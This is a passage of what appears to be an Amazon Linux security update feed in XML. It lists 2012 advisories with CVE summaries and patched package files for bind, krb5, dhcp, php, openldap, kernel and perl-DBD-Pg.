Linux that fix the following vulnerabilities:
CVE-2012-1151:
Two format string flaws were found in perl-DBD-Pg. A specially-crafted database warning or error message from a server could cause an application using perl-DBD-Pg to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Multiple format string vulnerabilities in dbdimp.c in DBD::Pg (aka DBD-Pg or libdbd-pg-perl) module before 2.19.0 for Perl allow remote PostgreSQL database servers to cause a denial of service (process crash) via format string specifiers in (1) a crafted database warning to the pg_warn function or (2) a crafted DBD statement to the dbd_st_prepare function.
801733:
CVE-2012-1151 perl-DBD-Pg: Format string flaws by turning db notices into Perl warnings and by preparing DBD statement
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1151" title="" id="CVE-2012-1151" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1116.html" title="" id="RHSA-2012:1116" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-DBD-Pg" version="2.15.1" release="4.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-DBD-Pg-2.15.1-4.3.amzn1.i686.rpm</filename></package><package name="perl-DBD-Pg-debuginfo" version="2.15.1" release="4.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-DBD-Pg-debuginfo-2.15.1-4.3.amzn1.i686.rpm</filename></package><package name="perl-DBD-Pg-debuginfo" version="2.15.1" release="4.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-DBD-Pg-debuginfo-2.15.1-4.3.amzn1.x86_64.rpm</filename></package><package name="perl-DBD-Pg" version="2.15.1" release="4.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-DBD-Pg-2.15.1-4.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-113</id><title>Amazon Linux - ALAS-2012-113: important priority package update for bind</title><issued date="2012-08-03 15:55:00" /><updated date="2014-09-14 16:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3817:
ISC BIND 9.4.x, 9.5.x, 9.6.x, and 9.7.x before 9.7.6-P2; 9.8.x before 9.8.3-P2; 9.9.x before 9.9.1-P2; and 9.6-ESV before 9.6-ESV-R7-P2, when DNSSEC validation is enabled, does not properly initialize the failing-query cache, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) by sending many queries.
An uninitialized data structure use flaw was found in BIND when DNSSEC validation was enabled. A remote attacker able to send a large number of queries to a DNSSEC validating BIND resolver could use this flaw to cause it to exit unexpectedly with an assertion failure.
842897:
CVE-2012-3817 bind: heavy DNSSEC validation load can cause assertion failure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3817" title="" id="CVE-2012-3817" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1123.html" title="" id="RHSA-2012:1123" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind-libs" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.23.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.23.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-114</id><title>Amazon Linux - ALAS-2012-114: important priority package update for krb5</title><issued date="2012-08-03 15:55:00" /><updated date="2014-09-14 16:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1015:
The kdc_handle_protected_negotiation function in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x, 1.9.x before 1.9.5, and 1.10.x before 1.10.3 attempts to calculate a checksum before verifying that the key type is appropriate for a checksum, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free, heap memory corruption, and daemon crash) via a crafted AS-REQ request.
An uninitialized pointer use flaw was found in the way the MIT Kerberos KDC handled initial authentication requests (AS-REQ). A remote, unauthenticated attacker could use this flaw to crash the KDC via a specially-crafted AS-REQ request.
838012:
CVE-2012-1015 krb5: KDC daemon crash via free() of an uninitialized pointer
CVE-2012-1013:
The check_1_6_dummy function in lib/kadm5/srv/svr_principal.c in kadmind in MIT Kerberos 5 (aka krb5) 1.8.x, 1.9.x, and 1.10.x before 1.10.2 allows remote authenticated administrators to cause a denial of service (NULL pointer dereference and daemon crash) via a KRB5_KDB_DISALLOW_ALL_TIX create request that lacks a password.
A NULL pointer dereference flaw was found in the MIT Kerberos administration daemon, kadmind. A Kerberos administrator who has the "create" privilege could use this flaw to crash kadmind.
827517:
CVE-2012-1013 krb5: kadmind denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1013" title="" id="CVE-2012-1013" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1015" title="" id="CVE-2012-1015" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1131.html" title="" id="RHSA-2012:1131" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="krb5-pkinit-openssl" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.9" release="33.22.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.9-33.22.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.9-33.22.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="33.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.9-33.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-115</id><title>Amazon Linux - ALAS-2012-115: medium priority package update for dhcp</title><issued date="2012-08-03 15:56:00" /><updated date="2014-09-14 16:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3954:
Two memory leak flaws were found in the dhcpd daemon. A remote attacker could use these flaws to cause dhcpd to exhaust all available memory by sending a large number of DHCP requests.
Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests.
842428:
CVE-2012-3954 dhcp: two memory leaks may result in DoS
CVE-2012-3571:
ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.
A denial of service flaw was found in the way the dhcpd daemon handled zero-length client identifiers. A remote attacker could use this flaw to send a specially-crafted request to dhcpd, possibly causing it to enter an infinite loop and consume an excessive amount of CPU time.
842420:
CVE-2012-3571 dhcp: DoS due to error in handling malformed client identifiers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3571" title="" id="CVE-2012-3571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3954" title="" id="CVE-2012-3954" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1141.html" title="" id="RHSA-2012:1141" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="dhcp" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-31.P1.17.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="31.P1.17.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-31.P1.17.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-116</id><title>Amazon Linux - ALAS-2012-116: low priority package update for php</title><issued date="2012-08-05 14:14:00" /><updated date="2014-09-14 16:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2688:
Unspecified vulnerability in the _php_stream_scandir function in the stream implementation in PHP before 5.3.15 and 5.4.x before 5.4.5 has unknown impact and remote attack vectors, related to an "overflow."
828051:
CVE-2012-2688 php: Integer Signedness issues in _php_stream_scandir
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2688" title="" id="CVE-2012-2688" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-cli" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.15" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.15-1.22.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.15-1.22.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.15" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.15-1.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-117</id><title>Amazon Linux - ALAS-2012-117: low priority package update for openldap</title><issued date="2012-08-18 05:14:00" /><updated date="2014-09-14 16:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2668:
libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31 and earlier, when using the Mozilla NSS backend, always uses the default cipher suite even when TLSCipherSuite is set, which might cause OpenLDAP to use weaker ciphers than intended and make it easier for remote attackers to obtain sensitive information.
It was found that the OpenLDAP server daemon ignored olcTLSCipherSuite settings. This resulted in the default cipher suite always being used, which could lead to weaker than expected ciphers being accepted during Transport Layer Security (TLS) negotiation with OpenLDAP clients.
825875:
CVE-2012-2668 openldap: does not honor TLSCipherSuite settings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2668" title="" id="CVE-2012-2668" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1151.html" title="" id="RHSA-2012:1151" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openldap-clients" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="26.16.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-26.16.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-26.16.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="26.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-26.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-118</id><title>Amazon Linux - ALAS-2012-118: medium priority package update for kernel</title><issued date="2012-08-21 21:04:00" /><updated date="2014-09-14 16:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3430:
820039:
CVE-2012-3430 kernel: recv{from,msg}() on an rds socket can leak kernel memory
* A flaw was found in the way the msg_namelen variable in the rds_recvmsg() function of the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was initialized. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3430" title="" id="CVE-2012-3430" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.28" release="45.62.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.28-45.62.amzn1.noarch.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.28-45.62.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.62.amzn1" epoch="0" 